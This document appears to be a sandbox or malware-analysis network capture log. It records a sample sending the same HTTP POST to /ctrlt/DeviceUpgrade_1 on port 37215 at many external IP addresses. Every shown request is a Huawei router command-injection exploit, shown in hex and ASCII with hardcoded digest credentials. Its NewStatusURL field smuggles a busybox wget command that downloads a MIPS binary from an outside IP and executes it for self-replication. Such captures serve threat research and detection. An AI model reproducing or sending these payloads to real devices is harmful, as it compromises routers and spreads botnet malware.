                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          237192.168.2.234294862.45.133.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154635906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          238192.168.2.2347176157.155.97.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154670000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          239192.168.2.235313091.34.171.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154685020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          240192.168.2.2343604157.129.182.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.154691935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          241192.168.2.235077641.83.55.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155023098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          242192.168.2.2353138181.223.252.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155059099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          243192.168.2.2345866175.27.181.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155066967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          244192.168.2.234699073.232.93.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155597925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          245192.168.2.2350446197.126.148.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155605078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          246192.168.2.2346762157.10.183.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155630112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
